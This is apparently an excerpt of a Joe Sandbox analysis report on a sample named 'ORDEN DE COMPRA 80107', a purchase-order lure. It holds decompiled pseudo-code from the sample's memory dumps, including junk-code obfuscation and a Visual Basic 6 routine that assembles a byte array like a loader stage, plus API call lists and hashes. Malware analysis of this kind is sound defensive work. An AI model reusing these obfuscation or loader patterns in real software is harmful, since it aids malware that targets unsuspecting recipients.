				_push( *0x35ff3535);
				_t16 = _t7 ^ 0xf13033 ^  *(_t7 ^ 0xf13033);
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *_t16 =  *_t16 + _t16;
				 *0x350a3535 =  *0x350a3535 + _t35;
				asm("cmc");
				_push( *0x35ff3535);
				_push( *0x35913535);
				_t24 = _t16 ^ 0x35ff6bf7;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				 *_t24 =  *_t24 + _t24;
				_push( *0x35ff3535);
				_push( *_t34);
				_push( *0x34ff3535);
				_t30 = _t24 ^ 0x34633f01;
				_t31 = _t30 & 0x00000000;
				 *_t31 =  *_t31 + _t31;
				 *_t31 =  *_t31 + _t31;
				 *_t31 =  *_t31 + _t31;
				 *_t31 =  *_t31 + _t31;
				 *_t31 =  *_t31 + _t31;
				 *_t31 =  *_t31 + _t31;
				 *_t31 =  *_t31 + _t31;
				 *_t31 =  *_t31 + _t31;
				 *_t31 =  *_t31 + _t31;
				 *_t31 =  *_t31 + _t31;
				 *_t31 =  *_t31 + _t31;
				 *_t31 =  *_t31 + _t31;
				 *_t31 =  *_t31 + _t31;
				 *_t31 =  *_t31 + _t31;
				 *_t31 =  *_t31 + _t31;
				 *_t31 =  *_t31 + _t31;
				 *_t31 =  *_t31 + _t31;
				 *_t31 =  *_t31 + _t31;
				 *_t31 =  *_t31 + _t31;
				 *_t31 =  *_t31 + _t31;
				 *_t31 =  *_t31 + _t31;
				 *_t31 =  *_t31 + _t31;
				 *_t31 =  *_t31 + _t31;
				 *_t31 =  *_t31 + _t31;
				 *_t31 =  *_t31 + _t31;
				 *_t31 =  *_t31 + _t31;
				 *_t31 =  *_t31 + _t31;
				 *_t31 =  *_t31 + _t31;
				 *_t31 =  *_t31 + _t31;
				 *_t31 =  *_t31 + _t31;
				 *_t31 =  *_t31 + _t31;
				 *_t31 =  *_t31 + _t31;
				 *_t31 =  *_t31 + _t31;
				 *_t31 =  *_t31 + _t31;
				 *_t31 =  *_t31 + _t31;
				 *_t31 =  *_t31 + _t31;
				 *_t31 =  *_t31 + _t31;
				 *0x350a3535 =  *0x350a3535 + _t35;
				_push( *0x32ff3535);
				goto ( *__esp);
			}

0x0040193c
0x00401947
0x0040194c
0x0040194d
0x0040194f
0x00401951
0x00401953
0x00401955
0x00401957
0x00401959
0x0040195b
0x0040195d
0x0040195f
0x00401961
0x00401963
0x00401965
0x00401967
0x00401969
0x0040196b
0x0040196d
0x0040196f
0x00401971
0x00401973
0x00401975
0x00401977
0x00401979
0x0040197b
0x0040197d
0x0040197f
0x00401981
0x00401983
0x00401985
0x00401987
0x00401989
0x0040198b
0x0040198d
0x0040198f
0x00401991
0x00401993
0x00401995
0x00401997
0x00401999
0x0040199b
0x0040199d
0x0040199f
0x004019b0
0x004019c0
0x004019d0
0x004019d2
0x004019d4
0x004019d6
0x004019d8
0x004019da
0x004019dc
0x004019de
0x004019e0
0x004019e2
0x004019e4
0x004019e6
0x004019e8
0x004019ea
0x004019ec
0x004019ee
0x004019f0
0x004019f2
0x004019f4
0x004019f6
0x004019f8
0x004019fa
0x004019fc
0x004019fe
0x00401a00
0x00401a02
0x00401a04
0x00401a06
0x00401a08
0x00401a0a
0x00401a0c
0x00401a0e
0x00401a10
0x00401a12
0x00401a14
0x00401a16
0x00401a18
0x00401a1a
0x00401a1c
0x00401a2c
0x00401a3c
0x00401a4c
0x00401a52
0x00401a57
0x00401a59
0x00401a5b
0x00401a5d
0x00401a5f
0x00401a61
0x00401a63
0x00401a65
0x00401a67
0x00401a69
0x00401a6b
0x00401a6d
0x00401a6f
0x00401a71
0x00401a73
0x00401a75
0x00401a77
0x00401a79
0x00401a7b
0x00401a7d
0x00401a7f
0x00401a81
0x00401a83
0x00401a85
0x00401a87
0x00401a89
0x00401a8b
0x00401a8d
0x00401a8f
0x00401a91
0x00401a93
0x00401a95
0x00401a97
0x00401a99
0x00401a9b
0x00401aac
0x00401abc
0x00401ac0
0x00401ac6
0x00401acf
0x00401ad2
0x00401ad4
0x00401ad6
0x00401ad8
0x00401ada
0x00401adc
0x00401ade
0x00401ae0
0x00401ae2
0x00401ae4
0x00401ae6
0x00401ae8
0x00401aea
0x00401aec
0x00401aee
0x00401af0
0x00401af2
0x00401af4
0x00401af6
0x00401af8
0x00401afa
0x00401afc
0x00401afe
0x00401b00
0x00401b02
0x00401b04
0x00401b06
0x00401b08
0x00401b0a
0x00401b0c
0x00401b0e
0x00401b10
0x00401b12
0x00401b14
0x00401b16
0x00401b18
0x00401b1a
0x00401b1c
0x00401b2c
0x00401b34

Memory Dump Source

Source File: 00000000.00000002.366764718.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.366760413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366771153.0000000000406000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366777936.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366782993.0000000000413000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366793825.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366797544.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366803272.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ORDEN DE COMPRA 80107.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b77f3bfc425ee03ddcfca1849ce53517b332b318abee45743ae1ffab03ec54bf
Instruction ID: 8b7c01dac3713e3d16114ad77a97734e19517aedf4ab66b5f32e48ac520fdf9d
Opcode Fuzzy Hash: b77f3bfc425ee03ddcfca1849ce53517b332b318abee45743ae1ffab03ec54bf
Instruction Fuzzy Hash: 7B01BBAE07D1D35AD7820E70A451E433A715B4A2633CA3CF3A40DFB895C525E6139663

Uniqueness

Uniqueness Score: -1.00%

Function 004071BA Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.366771153.0000000000406000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.366760413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366764718.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366777936.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366782993.0000000000413000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366793825.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366797544.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366803272.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ORDEN DE COMPRA 80107.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdce7785bafbd9397638d6a0aec1c7163132dea9ee7084036d6e8f275ca0bca0
Instruction ID: 65ddb66a2f6102a5a54ffef0d278b7fe1ce6c4755d88202e6bc9773bf1caa119
Opcode Fuzzy Hash: fdce7785bafbd9397638d6a0aec1c7163132dea9ee7084036d6e8f275ca0bca0
Instruction Fuzzy Hash: 0CE006BD1380C396C5510E60A401D537676678A2277DE3CE37148F6D94C931D1535573

Uniqueness

Uniqueness Score: -1.00%

Function 00426CF9 Relevance: 102.3, APIs: 68, Instructions: 317
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 52%

			E00426CF9(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a16, signed int* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				char _v32;
				void* _v36;
				signed int _v40;
				char _v44;
				intOrPtr* _v48;
				signed int _v52;
				signed int _v64;
				intOrPtr* _v68;
				signed int _v72;
				intOrPtr* _v76;
				signed int _v80;
				char* _t92;
				signed int _t95;
				char* _t96;
				char* _t100;
				signed int _t104;
				char* _t106;
				void* _t177;
				void* _t179;
				intOrPtr _t180;

				_t180 = _t179 - 0xc;
				 *[fs:0x0] = _t180;
				L00401330();
				_v16 = _t180;
				_v12 = 0x401238;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x38,  *[fs:0x0], 0x401336, _t177);
				L00401504();
				 *_a20 =  *_a20 & 0x00000000;
				if( *0x42a010 != 0) {
					_v68 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v68 = 0x42a010;
				}
				_t92 =  &_v44;
				L00401564();
				_v48 = _t92;
				_t95 =  *((intOrPtr*)( *_v48 + 0x1bc))(_v48, _t92,  *((intOrPtr*)( *((intOrPtr*)( *_v68)) + 0x360))( *_v68));
				asm("fclex");
				_v52 = _t95;
				if(_v52 >= 0) {
					_v72 = _v72 & 0x00000000;
				} else {
					_push(0x1bc);
					_push(0x40faec);
					_push(_v48);
					_push(_v52);
					L00401558();
					_v72 = _t95;
				}
				L00401552();
				_push(0);
				_push(0x1a);
				_push(1);
				_push(0x11);
				_t96 =  &_v32;
				_push(_t96);
				_push(1);
				_push(0x80);
				L0040147A();
				L0040146E();
				_push(0);
				_push(_v32);
				L00401474();
				 *_t96 = _t96;
				L0040146E();
				_push(1);
				_push(_v32);
				L00401474();
				 *_t96 = _t96;
				L0040146E();
				_push(2);
				_push(_v32);
				L00401474();
				 *_t96 = _t96;
				L0040146E();
				_push(3);
				_push(_v32);
				L00401474();
				 *_t96 = _t96;
				L0040146E();
				_push(4);
				_push(_v32);
				L00401474();
				 *_t96 = _t96;
				L0040146E();
				_push(5);
				_push(_v32);
				L00401474();
				 *_t96 = _t96;
				L0040146E();
				_push(6);
				_push(_v32);
				L00401474();
				 *_t96 = _t96;
				L0040146E();
				_push(7);
				_push(_v32);
				L00401474();
				 *_t96 = _t96;
				L0040146E();
				_push(8);
				_push(_v32);
				L00401474();
				 *_t96 = _t96;
				L0040146E();
				_push(9);
				_push(_v32);
				L00401474();
				 *_t96 = _t96;
				L0040146E();
				_push(0xa);
				_push(_v32);
				L00401474();
				 *_t96 = _t96;
				L0040146E();
				_push(0xb);
				_push(_v32);
				L00401474();
				 *_t96 = _t96;
				L0040146E();
				_push(0xc);
				_push(_v32);
				L00401474();
				 *_t96 = _t96;
				L0040146E();
				_push(0xd);
				_push(_v32);
				L00401474();
				 *_t96 = _t96;
				L0040146E();
				_push(0xe);
				_push(_v32);
				L00401474();
				 *_t96 = _t96;
				L0040146E();
				_push(0xf);
				_push(_v32);
				L00401474();
				 *_t96 = _t96;
				L0040146E();
				_push(0x10);
				_push(_v32);
				L00401474();
				 *_t96 = _t96;
				L0040146E();
				_push(0x11);
				_push(_v32);
				L00401474();
				 *_t96 = _t96;
				L0040146E();
				_push(0x12);
				_push(_v32);
				L00401474();
				 *_t96 = _t96;
				L0040146E();
				_push(0x13);
				_push(_v32);
				L00401474();
				 *_t96 = _t96;
				L0040146E();
				_push(0x14);
				_push(_v32);
				L00401474();
				 *_t96 = _t96;
				L0040146E();
				_push(0x15);
				_push(_v32);
				L00401474();
				 *_t96 = _t96;
				L0040146E();
				_push(0x16);
				_push(_v32);
				L00401474();
				 *_t96 = _t96;
				L0040146E();
				_push(0x17);
				_push(_v32);
				L00401474();
				 *_t96 = _t96;
				L0040146E();
				_push(0x18);
				_push(_v32);
				L00401474();
				 *_t96 = _t96;
				L0040146E();
				_push(0x19);
				_push(_v32);
				L00401474();
				 *_t96 = _t96;
				L0040146E();
				_push(0x1a);
				_push(_v32);
				L00401474();
				 *_t96 = _t96;
				if( *0x42a010 != 0) {
					_v76 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v76 = 0x42a010;
				}
				_t100 =  &_v44;
				L00401564();
				_v48 = _t100;
				_t104 =  *((intOrPtr*)( *_v48 + 0x48))(_v48,  &_v40, _t100,  *((intOrPtr*)( *((intOrPtr*)( *_v76)) + 0x360))( *_v76));
				asm("fclex");
				_v52 = _t104;
				if(_v52 >= 0) {
					_v80 = _v80 & 0x00000000;
				} else {
					_push(0x48);
					_push(0x40faec);
					_push(_v48);
					_push(_v52);
					L00401558();
					_v80 = _t104;
				}
				_v64 = _v40;
				_v40 = _v40 & 0x00000000;
				L00401588();
				L00401552();
				_push(0x427131);
				L00401516();
				_t106 =  &_v32;
				_push(_t106);
				_push(0);
				L00401468();
				return _t106;
			}

0x00426cfc
0x00426d0b
0x00426d15
0x00426d1d
0x00426d20
0x00426d27
0x00426d36
0x00426d3f
0x00426d47
0x00426d51
0x00426d6b
0x00426d53
0x00426d53
0x00426d58
0x00426d5d
0x00426d62
0x00426d62
0x00426d86
0x00426d8a
0x00426d8f
0x00426d9a
0x00426da0
0x00426da2
0x00426da9
0x00426dc5
0x00426dab
0x00426dab
0x00426db0
0x00426db5
0x00426db8
0x00426dbb
0x00426dc0
0x00426dc0
0x00426dcc
0x00426dd1
0x00426dd3
0x00426dd5
0x00426dd7
0x00426dd9
0x00426ddc
0x00426ddd
0x00426ddf
0x00426de4
0x00426df0
0x00426df7
0x00426df9
0x00426dfc
0x00426e01
0x00426e07
0x00426e0e
0x00426e10
0x00426e13
0x00426e18
0x00426e1e
0x00426e25
0x00426e27
0x00426e2a
0x00426e2f
0x00426e35
0x00426e3c
0x00426e3e
0x00426e41
0x00426e46
0x00426e4c
0x00426e53
0x00426e55
0x00426e58
0x00426e5d
0x00426e63
0x00426e6a
0x00426e6c
0x00426e6f
0x00426e74
0x00426e7a
0x00426e81
0x00426e83
0x00426e86
0x00426e8b
0x00426e91
0x00426e98
0x00426e9a
0x00426e9d
0x00426ea2
0x00426ea8
0x00426eaf
0x00426eb1
0x00426eb4
0x00426eb9
0x00426ebf
0x00426ec6
0x00426ec8
0x00426ecb
0x00426ed0
0x00426ed6
0x00426edd
0x00426edf
0x00426ee2
0x00426ee7
0x00426eed
0x00426ef4
0x00426ef6
0x00426ef9
0x00426efe
0x00426f04
0x00426f0b
0x00426f0d
0x00426f10
0x00426f15
0x00426f1b
0x00426f22
0x00426f24
0x00426f27
0x00426f2c
0x00426f32
0x00426f39
0x00426f3b
0x00426f3e
0x00426f43
0x00426f49
0x00426f50
0x00426f52
0x00426f55
0x00426f5a
0x00426f60
0x00426f67
0x00426f69
0x00426f6c
0x00426f71
0x00426f77
0x00426f7e
0x00426f80
0x00426f83
0x00426f88
0x00426f8e
0x00426f95
0x00426f97
0x00426f9a
0x00426f9f
0x00426fa5
0x00426fac
0x00426fae
0x00426fb1
0x00426fb6
0x00426fbc
0x00426fc3
0x00426fc5
0x00426fc8
0x00426fcd
0x00426fd3
0x00426fda
0x00426fdc
0x00426fdf
0x00426fe4
0x00426fea
0x00426ff1
0x00426ff3
0x00426ff6
0x00426ffb
0x00427001
0x00427008
0x0042700a
0x0042700d
0x00427012
0x00427018
0x0042701f
0x00427021
0x00427024
0x00427029
0x0042702f
0x00427036
0x00427038
0x0042703b
0x00427040
0x00427046
0x0042704d
0x0042704f
0x00427052
0x00427057
0x00427060
0x0042707a
0x00427062
0x00427062
0x00427067
0x0042706c
0x00427071
0x00427071
0x00427095
0x00427099
0x0042709e
0x004270ad
0x004270b0
0x004270b2
0x004270b9
0x004270d2
0x004270bb
0x004270bb
0x004270bd
0x004270c2
0x004270c5
0x004270c8
0x004270cd
0x004270cd
0x004270d9
0x004270dc
0x004270e6
0x004270ee
0x004270f3
0x00427120
0x00427125
0x00427128
0x00427129
0x0042712b
0x00427130

APIs

__vbaChkstk.MSVBVM60(?,00401336), ref: 00426D15
__vbaStrCopy.MSVBVM60(?,?,?,?,00401336), ref: 00426D3F
__vbaNew2.MSVBVM60(004101D4,0042A010,?,?,?,?,00401336), ref: 00426D5D
__vbaObjSet.MSVBVM60(?,00000000), ref: 00426D8A
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FAEC,000001BC), ref: 00426DBB
__vbaFreeObj.MSVBVM60(00000000,?,0040FAEC,000001BC), ref: 00426DCC
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,0000001A,00000000), ref: 00426DE4
__vbaUI1I2.MSVBVM60(?,?,?,?,?,?,00401336), ref: 00426DF0
__vbaDerefAry1.MSVBVM60(?,00000000,?,?,?,?,?,?,00401336), ref: 00426DFC
__vbaUI1I2.MSVBVM60(?,00000000,?,?,?,?,?,?,00401336), ref: 00426E07
__vbaDerefAry1.MSVBVM60(?,00000001,?,00000000,?,?,?,?,?,?,00401336), ref: 00426E13
__vbaUI1I2.MSVBVM60(?,00000001,?,00000000,?,?,?,?,?,?,00401336), ref: 00426E1E
__vbaDerefAry1.MSVBVM60(?,00000002,?,00000001,?,00000000,?,?,?,?,?,?,00401336), ref: 00426E2A
__vbaUI1I2.MSVBVM60(?,00000002,?,00000001,?,00000000,?,?,?,?,?,?,00401336), ref: 00426E35
__vbaDerefAry1.MSVBVM60(?,00000003,?,00000002,?,00000001,?,00000000,?,?,?,?,?,?,00401336), ref: 00426E41
__vbaUI1I2.MSVBVM60(?,00000003,?,00000002,?,00000001,?,00000000,?,?,?,?,?,?,00401336), ref: 00426E4C
__vbaDerefAry1.MSVBVM60(?,00000004,?,00000003,?,00000002,?,00000001,?,00000000), ref: 00426E58
__vbaUI1I2.MSVBVM60(?,00000004,?,00000003,?,00000002,?,00000001,?,00000000), ref: 00426E63
__vbaDerefAry1.MSVBVM60(?,00000005,?,00000004,?,00000003,?,00000002,?,00000001,?,00000000), ref: 00426E6F
__vbaUI1I2.MSVBVM60(?,00000005,?,00000004,?,00000003,?,00000002,?,00000001,?,00000000), ref: 00426E7A
__vbaDerefAry1.MSVBVM60(?,00000006,?,00000005,?,00000004,?,00000003,?,00000002,?,00000001,?,00000000), ref: 00426E86
__vbaUI1I2.MSVBVM60(?,00000006,?,00000005,?,00000004,?,00000003,?,00000002,?,00000001,?,00000000), ref: 00426E91
__vbaDerefAry1.MSVBVM60(?,00000007,?,00000006,?,00000005,?,00000004,?,00000003,?,00000002,?,00000001,?,00000000), ref: 00426E9D
__vbaUI1I2.MSVBVM60(?,00000007,?,00000006,?,00000005,?,00000004,?,00000003,?,00000002,?,00000001,?,00000000), ref: 00426EA8
__vbaDerefAry1.MSVBVM60(?,00000008,?,00000007,?,00000006,?,00000005,?,00000004,?,00000003,?,00000002,?,00000001), ref: 00426EB4
__vbaUI1I2.MSVBVM60(?,00000008,?,00000007,?,00000006,?,00000005,?,00000004,?,00000003,?,00000002,?,00000001), ref: 00426EBF
__vbaDerefAry1.MSVBVM60(?,00000009,?,00000008,?,00000007,?,00000006,?,00000005,?,00000004,?,00000003,?,00000002), ref: 00426ECB
__vbaUI1I2.MSVBVM60(?,00000009,?,00000008,?,00000007,?,00000006,?,00000005,?,00000004,?,00000003,?,00000002), ref: 00426ED6
__vbaDerefAry1.MSVBVM60(?,0000000A,?,00000009,?,00000008,?,00000007,?,00000006,?,00000005,?,00000004,?,00000003), ref: 00426EE2
__vbaUI1I2.MSVBVM60(?,0000000A,?,00000009,?,00000008,?,00000007,?,00000006,?,00000005,?,00000004,?,00000003), ref: 00426EED
__vbaDerefAry1.MSVBVM60(?,0000000B,?,0000000A,?,00000009,?,00000008,?,00000007,?,00000006,?,00000005,?,00000004), ref: 00426EF9
__vbaUI1I2.MSVBVM60(?,0000000B,?,0000000A,?,00000009,?,00000008,?,00000007,?,00000006,?,00000005,?,00000004), ref: 00426F04
__vbaDerefAry1.MSVBVM60(?,0000000C,?,0000000B,?,0000000A,?,00000009,?,00000008,?,00000007,?,00000006,?,00000005), ref: 00426F10
__vbaUI1I2.MSVBVM60(?,0000000C,?,0000000B,?,0000000A,?,00000009,?,00000008,?,00000007,?,00000006,?,00000005), ref: 00426F1B
__vbaDerefAry1.MSVBVM60(?,0000000D,?,0000000C,?,0000000B,?,0000000A,?,00000009,?,00000008,?,00000007,?,00000006), ref: 00426F27
__vbaUI1I2.MSVBVM60(?,0000000D,?,0000000C,?,0000000B,?,0000000A,?,00000009,?,00000008,?,00000007,?,00000006), ref: 00426F32
__vbaDerefAry1.MSVBVM60(?,0000000E,?,0000000D,?,0000000C,?,0000000B,?,0000000A,?,00000009,?,00000008,?,00000007), ref: 00426F3E
__vbaUI1I2.MSVBVM60(?,0000000E,?,0000000D,?,0000000C,?,0000000B,?,0000000A,?,00000009,?,00000008,?,00000007), ref: 00426F49
__vbaDerefAry1.MSVBVM60(?,0000000F,?,0000000E,?,0000000D,?,0000000C,?,0000000B,?,0000000A,?,00000009,?,00000008), ref: 00426F55
__vbaUI1I2.MSVBVM60(?,0000000F,?,0000000E,?,0000000D,?,0000000C,?,0000000B,?,0000000A,?,00000009,?,00000008), ref: 00426F60
__vbaDerefAry1.MSVBVM60(?,00000010,?,0000000F,?,0000000E,?,0000000D,?,0000000C,?,0000000B,?,0000000A,?,00000009), ref: 00426F6C
__vbaUI1I2.MSVBVM60(?,00000010,?,0000000F,?,0000000E,?,0000000D,?,0000000C,?,0000000B,?,0000000A,?,00000009), ref: 00426F77
__vbaDerefAry1.MSVBVM60(?,00000011,?,00000010,?,0000000F,?,0000000E,?,0000000D,?,0000000C,?,0000000B,?,0000000A), ref: 00426F83
__vbaUI1I2.MSVBVM60(?,00000011,?,00000010,?,0000000F,?,0000000E,?,0000000D,?,0000000C,?,0000000B,?,0000000A), ref: 00426F8E
__vbaDerefAry1.MSVBVM60(?,00000012,?,00000011,?,00000010,?,0000000F,?,0000000E,?,0000000D,?,0000000C,?,0000000B), ref: 00426F9A
__vbaUI1I2.MSVBVM60(?,00000012,?,00000011,?,00000010,?,0000000F,?,0000000E,?,0000000D,?,0000000C,?,0000000B), ref: 00426FA5
__vbaDerefAry1.MSVBVM60(?,00000013,?,00000012,?,00000011,?,00000010,?,0000000F,?,0000000E,?,0000000D,?,0000000C), ref: 00426FB1
__vbaUI1I2.MSVBVM60(?,00000013,?,00000012,?,00000011,?,00000010,?,0000000F,?,0000000E,?,0000000D,?,0000000C), ref: 00426FBC
__vbaDerefAry1.MSVBVM60(?,00000014,?,00000013,?,00000012,?,00000011,?,00000010,?,0000000F,?,0000000E,?,0000000D), ref: 00426FC8
__vbaUI1I2.MSVBVM60(?,00000014,?,00000013,?,00000012,?,00000011,?,00000010,?,0000000F,?,0000000E,?,0000000D), ref: 00426FD3
__vbaDerefAry1.MSVBVM60(?,00000015,?,00000014,?,00000013,?,00000012,?,00000011,?,00000010,?,0000000F,?,0000000E), ref: 00426FDF
__vbaUI1I2.MSVBVM60(?,00000015,?,00000014,?,00000013,?,00000012,?,00000011,?,00000010,?,0000000F,?,0000000E), ref: 00426FEA
__vbaDerefAry1.MSVBVM60(?,00000016,?,00000015,?,00000014,?,00000013,?,00000012,?,00000011,?,00000010,?,0000000F), ref: 00426FF6
__vbaUI1I2.MSVBVM60(?,00000016,?,00000015,?,00000014,?,00000013,?,00000012,?,00000011,?,00000010,?,0000000F), ref: 00427001
__vbaDerefAry1.MSVBVM60(?,00000017,?,00000016,?,00000015,?,00000014,?,00000013,?,00000012,?,00000011,?,00000010), ref: 0042700D
__vbaUI1I2.MSVBVM60(?,00000017,?,00000016,?,00000015,?,00000014,?,00000013,?,00000012,?,00000011,?,00000010), ref: 00427018
__vbaDerefAry1.MSVBVM60(?,00000018,?,00000017,?,00000016,?,00000015,?,00000014,?,00000013,?,00000012,?,00000011), ref: 00427024
__vbaUI1I2.MSVBVM60(?,00000018,?,00000017,?,00000016,?,00000015,?,00000014,?,00000013,?,00000012,?,00000011), ref: 0042702F
__vbaDerefAry1.MSVBVM60(?,00000019,?,00000018,?,00000017,?,00000016,?,00000015,?,00000014,?,00000013,?,00000012), ref: 0042703B
__vbaUI1I2.MSVBVM60(?,00000019,?,00000018,?,00000017,?,00000016,?,00000015,?,00000014,?,00000013,?,00000012), ref: 00427046
__vbaDerefAry1.MSVBVM60(?,0000001A,?,00000019,?,00000018,?,00000017,?,00000016,?,00000015,?,00000014,?,00000013), ref: 00427052
__vbaNew2.MSVBVM60(004101D4,0042A010,?,0000001A,?,00000019,?,00000018,?,00000017,?,00000016,?,00000015,?,00000014), ref: 0042706C
__vbaObjSet.MSVBVM60(?,00000000), ref: 00427099
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040FAEC,00000048), ref: 004270C8
__vbaStrMove.MSVBVM60(00000000,00000000,0040FAEC,00000048), ref: 004270E6
__vbaFreeObj.MSVBVM60(00000000,00000000,0040FAEC,00000048), ref: 004270EE
__vbaFreeStr.MSVBVM60(00427131), ref: 00427120
__vbaAryDestruct.MSVBVM60(00000000,?,00427131), ref: 0042712B

Memory Dump Source

Source File: 00000000.00000002.366782993.0000000000413000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.366760413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366764718.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366771153.0000000000406000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366777936.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366793825.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366797544.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366803272.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ORDEN DE COMPRA 80107.jbxd

Yara matches

Similarity

API ID: __vba$Ary1Deref$Free$CheckHresultNew2$ChkstkCopyDestructMoveRedim
String ID:
API String ID: 3421442052-0
Opcode ID: 5298dcb60f486623e53c78cb09e468b809cde51cae8b8637adc56e80557f6571
Instruction ID: b71b83b19977839b4e9bed41ae87a4fe812586c0454881c832f77315fa1f2539
Opcode Fuzzy Hash: 5298dcb60f486623e53c78cb09e468b809cde51cae8b8637adc56e80557f6571
Instruction Fuzzy Hash: 51C15170E81245AECB11BBA5D812FED7B70AF16708F44807AF5413B2F3C6790919DB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00411225 Relevance: 75.5, APIs: 41, Strings: 2, Instructions: 263
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 55%

			E00411225(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4, void* _a12) {
				intOrPtr _v0;
				intOrPtr _v8;
				intOrPtr _v12;
				short _v24;
				void* _v28;
				short _v32;
				char _v36;
				char _v40;
				char _v44;
				signed int _v48;
				char _v52;
				void* _v56;
				intOrPtr* _v60;
				signed int _v64;
				char _v68;
				void* _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				char* _v92;
				intOrPtr* _v100;
				void* _v104;
